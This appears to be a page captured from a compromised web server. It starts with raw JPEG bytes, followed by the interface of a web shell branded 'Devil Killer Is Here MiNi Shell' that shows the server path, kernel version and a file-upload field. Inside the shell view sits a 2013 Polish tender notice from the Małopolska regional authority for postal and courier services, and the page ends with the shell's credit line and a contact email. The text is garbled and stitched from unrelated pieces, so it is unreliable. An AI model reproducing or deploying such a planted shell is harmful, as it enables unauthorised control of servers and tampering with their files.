JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131022/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131022/430208-N-2013.html

<p class="kh_header"><b>Kraków: Świadczenie usług pocztowych i usług kurierskich, w obrocie krajowym
 i zagranicznym, oraz usług polegających na odbieraniu od Zamawiającego przesyłek pocztowych 
z budynku Urzędu Marszałkowskiego Województwa Małopolskiego i dostarczaniu ich do punktu pocztowego operatora pocztowego w celu ich nadania</b><br>
<b>Numer ogłoszenia: 430208 - 2013; data zamieszczenia: 22.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Małopolskie , ul. Basztowa 22, 31-156 Kraków, woj. małopolskie, tel. 012 4300394, 6303408,6303122, faks 012 6160144,6303126.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.malopolskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych i usług kurierskich, w obrocie krajowym
 i zagranicznym, oraz usług polegających na odbieraniu od Zamawiającego przesyłek pocztowych 
z budynku Urzędu Marszałkowskiego Województwa Małopolskiego i dostarczaniu ich do punktu pocztowego operatora pocztowego w celu ich nadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług pocztowych i usług kurierskich, w obrocie krajowym
 i zagranicznym, oraz usług polegających na odbieraniu od Zamawiającego przesyłek pocztowych z budynku Urzędu Marszałkowskiego Województwa Małopolskiego i dostarczaniu ich do punktu pocztowego operatora pocztowego w celu ich nadania.
Zamówienie składa się z dwóch części:
Część I obejmuje:
a)	Usługi pocztowe świadczone przez operatora pocztowego na rzecz Zamawiającego, wykonywane 
w obrocie krajowym i zagranicznym, w tym przesyłek zwróconych do Zamawiającego 
z powodu wyczerpania możliwości dostarczenia ich do adresata. Usługi te polegać będą na: przyjmowaniu, sortowaniu, przemieszczaniu i doręczaniu do adresata przesyłek listowych i paczek pocztowych. Usługi te nie będą obejmować przesyłek wymagających nadania u operatora wyznaczonego, zgodnie z przepisami prawa, w tym w szczególności zgodnie z Kodeksem postępowania administracyjnego (tekst jednolity Dz. U. z 2013 r., poz. 267). 
b)	Usługi odbioru przesyłek Zamawiającego z budynku Urzędu Marszałkowskiego Województwa Małopolskiego i dostarczania ich do punktu pocztowego operatora pocztowego w celu ich nadania.
Część II obejmuje:
Usługi kurierskie świadczone na rzecz Zamawiającego, wykonywane w obrocie krajowym 
i zagranicznym, wraz z odbieraniem i dostarczaniem przesyłek kurierskich z/do Urzędu Marszałkowskiego Województwa Małopolskiego.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające będą polegały na powtórzeniu tego samego rodzaju usług co zamówienie podstawowe. Wielkość lub zakres zamówień uzupełniających: nie więcej niż 20% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.20.00-4, 64.11.30.00-1, 64.10.00.00-7, 64.11.00.00-0, 64.12.11.00-1, 64.12.12.00-2, 64.12.00.00-3, 64.10.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, o których mowa w art. 22 ust. 1 ustawy.
2.	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
a)	dla części I zamówienia: warunek udziału w postępowaniu, o którym mowa w art. 22 ust 1 pkt 2, zostanie uznany za spełniony, gdy wykonawca wykaże się doświadczeniem w należytym wykonaniu (lub 
w wykonywaniu - w przypadku świadczeń okresowych lub ciągłych) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch usług odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia. Za usługę odpowiadającą swoim rodzajem i wartością usłudze, stanowiącej przedmiot zamówienia uważa się usługę pocztową, w rozumieniu ustawy z dnia 23 listopada 2012 r. Prawo Pocztowe (Dz. U. z 2012 r., poz. 1529), o wartości nie mniejszej niż 100 000,00 zł brutto.
3.	Wykonawca w zakresie spełniania warunków udziału w postępowaniu może polegać na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy. 
4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. konsorcjum, spółka cywilna), wskazane wyżej warunki udziału w postępowaniu mogą spełniać łącznie.
5.	Wykonawcy ubiegający się o udzielenie zamówienia nie mogą podlegać wykluczeniu na podstawie art. 24 ust. 1 ustawy.
6.	Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia, w oparciu o dokumenty załączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wraz z ofertą wykonawca winien złożyć również oświadczenie o spełnieniu przez oferowane usługi wymagań określonych przez zamawiającego - zał. nr 4 do siwz</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Jeżeli Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności poprzez przedstawienie pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji tych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
2.	Dokumenty potwierdzające, że wykonawca będzie dysponował zasobami innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy, w stopniu niezbędnym dla należytego wykonania zamówienia oraz umożliwiającym ocenę, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, winny  w szczególności zawierać informacje dotyczące: 
a)	zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
3.	W przypadku, gdy wykonawcę reprezentuje Pełnomocnik wraz z ofertą winno być złożone pełnomocnictwo dla tej osoby określające jego zakres. Pełnomocnictwo winno być podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy, w stosunku do treści oferty, 
na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia następującej okoliczności: 
a)	zmiany przepisów podatkowych w zakresie zmiany stawki podatku VAT. W takiej sytuacji zmiana stawki podatku VAT nie spowoduje zmiany cen jednostkowych brutto i maksymalnej wartości nominalnej zobowiązania Zamawiającego wynikającego z umowy, o którym mowa w:
- załączniku nr 3 i 6 do umowy o korzystanie z usług pocztowych w zakresie przyjmowania, sortowania, przemieszczania i doręczania przesyłek pocztowych wraz z usługą Poczta Firmowa (arkusz cenowy dla Części I zamówienia);
- załączniku nr 1 do umowy na nadawanie przesyłek kurierskich w obrocie krajowym 
i zagranicznym (arkusz cenowy dla Części II zamówienia);
e)	stosowania przez Wykonawcę innych nazw przesyłek tożsamych z przesyłkami określonymi przez Zamawiającego  w zał. nr 3 i 6 do umowy o korzystanie z usług pocztowych w zakresie przyjmowania, sortowania, przemieszczania i doręczania przesyłek pocztowych wraz z usługą Poczta Firmowa (arkusz cenowy dla Części I zamówienia) i zał. nr 1 do umowy na nadawanie przesyłek kurierskich w obrocie krajowym i zagranicznym (arkusz cenowy dla Części II zamówienia). W takim przypadku do cenników zostaną wprowadzone nazwy przesyłek stosowane przez Wykonawcę. Powyższa zmiana nazw przesyłek będzie podstawą do zmiany nazw na wystawianych fakturach i nie spowoduje zmian w zakresie świadczonej usługi, określonej w niniejszym siwz oraz cen jednostkowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wrotamalopolski.pl/BIP/um<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Małopolskiego, 30-017 Kraków, ul. Racławicka 56, pok. 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2013 godzina 14:00, miejsce: Urząd Marszałkowski Województwa Małopolskiego, Dziennik podawczy (Budynek B), 30-017 Kraków, ul. Racławicka 56.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Przedmiot zamówienia sfinansowany ze środków Unii Europejksiej: 
dla części I:
PT MRPO 9,82 %, PO PT 0,91 %, PT PROW 2,92 %, PT PO KL 1,04 %, MKZ 1,05 %
 razem:15,74 %
a)	Europejski Fundusz Rozwoju Regionalnego w ramach Pomocy Technicznej Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013 (PT MRPO) - 9,82 % udziału w wartości zamówienia,
b)	 Europejski Fundusz Rozwoju Regionalnego i Budżetu Państwa w ramach Programu Operacyjnego Pomoc Techniczna 2007 - 2013, w ramach dotacji celowej przekazanej Województwu Małopolskiemu na podstawie Porozumienia w sprawie funkcjonowania na terenie Województwa Małopolskiego Systemu Informacji o Funduszach Europejskich, realizowanego we współpracy z Ministerstwem Rozwoju Regionalnego (PO PT) - 0,91 % udziału w wartości zamówienia,
c)	Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich i Budżetu Państwa 
w ramach Pomocy Technicznej Programu Rozwoju Obszarów Wiejskich na lata 2007-2013. Schemat I: Wzmocnienie systemu zarządzania, monitorowania, kontroli i oceny stopnia realizacji Programu (PT PROW) -   2,92 % udziału w wartości zamówienia,
d)	Europejski Fundusz Społeczny w ramach Pomocy Technicznej Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 (PT PO KL) - 1,04 % udziału w wartości zamówienia,
e)	Europejski Fundusz Społeczny - Projekt systemowy Programu Operacyjnego Kapitał Ludzki na lata 2007-2013, Działanie 9.2 Modernizacja kształcenia zawodowego 
w Małopolsce (MKZ) - 1,05 % udziału w wartości zamówienia.
dla części II:
PT MRPO - 9,07 %, PO PT - 2,27 %,  PT PROW - 16,73 %, PT PO RYBY - 9,07 %, PT PO KL - 3,90 %, ADAPT2DC - 6,80 %, CLUE - 6,80 %, 
razem: 54,64 %
a)	Europejski Fundusz Rozwoju Regionalnego w ramach Pomocy Technicznej Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013 (PT MRPO) - 9,07 % udziału w wartości zamówienia,
b)	Europejski Fundusz Rozwoju Regionalnego i Budżetu Państwa w ramach Programu Operacyjnego Pomoc Techniczna 2007 - 2013, w ramach dotacji celowej przekazanej Województwu Małopolskiemu na podstawie Porozumienia w sprawie funkcjonowania na terenie Województwa Małopolskiego Systemu Informacji o Funduszach Europejskich, realizowanego we współpracy z Ministerstwem Rozwoju Regionalnego (PO PT) - 2,27 % udziału w wartości zamówienia,
c)	Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich i Budżetu Państwa 
w ramach Pomocy Technicznej Programu Rozwoju Obszarów Wiejskich na lata 2007-2013. Schemat I: Wzmocnienie systemu zarządzania, monitorowania, kontroli i oceny stopnia realizacji Programu (PT PROW) - 16,73 % udziału w wartości zamówienia,
d)	Europejski Fundusz Rybacki i Budżetu Państwa w ramach Pomocy Technicznej Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013 (PT PO RYBY) - 9,07 % udziału w wartości zamówienia,
e)	Europejski Fundusz Społeczny w ramach Pomocy Technicznej Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 (PT PO KL) - 3,90 % udziału w wartości zamówienia,
f)	Europejski Fundusz Rozwoju Regionalnego w ramach Programu dla Europy Środkowej (wdrożenie projektu ADAPT2DC) (ADAPT2DC) - 6,80 % udziału w wartości zamówienia,
g)	Europejski Fundusz Rozwoju Regionalnego w ramach Programu Współpracy Międzyregionalnej INTERREG IVC (wdrożenie projektu CLUE) (CLUE) - 6,80 % udziału.
2.Zamówienie należy wykonać w terminie: 
Część I
od dnia zawarcia umowy, jednak nie później niż od dnia 2 stycznia 2014 r., do dnia 31 grudnia 2014 r. lub do wykorzystania maksymalnej wartości nominalnej zobowiązania Zamawiającego wynikającego 
z umowy , o ile nastąpi to przed datą 31 grudnia 2014 r.
Część II
od dnia 2 stycznia 2014 r. do dnia 31 grudnia 2014 r. lub do wykorzystania maksymalnej wartości nominalnej zobowiązania Zamawiającego wynikającego z umowy, o ile nastąpi to przed datą 
31 grudnia 2014 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług pocztowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I obejmuje:
a)	Usługi pocztowe świadczone przez operatora pocztowego na rzecz Zamawiającego, wykonywane 
w obrocie krajowym i zagranicznym, w tym przesyłek zwróconych do Zamawiającego 
z powodu wyczerpania możliwości dostarczenia ich do adresata. Usługi te polegać będą na: przyjmowaniu, sortowaniu, przemieszczaniu i doręczaniu do adresata przesyłek listowych i paczek pocztowych. Usługi te nie będą obejmować przesyłek wymagających nadania u operatora wyznaczonego, zgodnie z przepisami prawa, w tym w szczególności zgodnie z Kodeksem postępowania administracyjnego (tekst jednolity Dz. U. z 2013 r., poz. 267). 
b)	Usługi odbioru przesyłek Zamawiającego z budynku Urzędu Marszałkowskiego Województwa Małopolskiego i dostarczania ich do punktu pocztowego operatora pocztowego w celu ich nadania.
b)	w przypadku gdy Wykonawca wprowadzi nowe zasady wykonywania usługi korzystne dla Zamawiającego, w tym powodujące obniżenie ceny wykonywania usługi. Maksymalna wartość nominalna zobowiązania Zamawiającego wynikającego z umowy pozostanie bez zmian.
c)	utworzenia nowej lokalizacji Zamawiającego lub zmiany istniejącej lokalizacji Zamawiającego - 
w takim przypadku do umowy zostaną wprowadzone zapisy o używaniu w nowej/zmienionej lokalizacji Zamawiającego pieczątki opłata pobrana; tym samym należność za nadania i zwroty przesyłek, które będą dokonywane w nowej/zmienionej lokalizacji Zamawiającego, będzie rozliczana w ramach umowy; Zamawiający, dokonując utworzenia nowej lokalizacji bądź dokonując zmiany istniejącej lokalizacji, uwzględnia ryzyko, iż takim przypadku odległość punktu pocztowego Wykonawcy od budynku Zamawiającego będzie większa niż 1 km - w Krakowie; 2 km - poza Krakowem, niemniej to pracownik Zamawiającego będzie wówczas dostarczać i nadawać osobiście przesyłki pocztowe w punkcie pocztowym Wykonawcy. Również Zamawiający dostosuje się do godzin pracy danego punktu pocztowego Wykonawcy; 
d)	pojawienia się potrzeby włączenia do umowy nowego programu współfinansowanego ze środków Unii Europejskiej, w ramach którego przedmiotowa usługa może być rozliczana w okresie obowiązywania umowy - w takim przypadku do umowy zostanie dopisane kolejne współfinansowanie, ale nie spowoduje to zmiany maksymalnej wartości nominalnej zobowiązania Zamawiającego wynikającego z umowy.
Zamawiajacy przewiduje udzielenie zamówień uzupełniających dla części I zamówienia. Zamówienia uzupełniające będą polegały na powtórzeniu tego samego rodzaju usług co zamówienie podstawowe. Wielkość lub zakres zamówień uzupełniających: nie więcej niż 20% wartości zamówienia podstawowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 64.11.20.00-4, 64.11.30.00-1, 64.10.00.00-7, 64.11.00.00-0, 64.12.11.00-1, 64.12.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług kurierskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi kurierskie świadczone na rzecz Zamawiającego, wykonywane w obrocie krajowym 
i zagranicznym, wraz z odbieraniem i dostarczaniem przesyłek kurierskich z/do Urzędu Marszałkowskiego Województwa Małopolskiego.
Zamawiajacy przewiduje udzielenie zamówień uzupełniających dla części II zamówienia. Zamówienia uzupełniające będą polegały na powtórzeniu tego samego rodzaju usług co zamówienie podstawowe. Wielkość lub zakres zamówień uzupełniających: nie więcej niż 20% wartości zamówienia podstawowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 64.12.00.00-3, 64.10.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com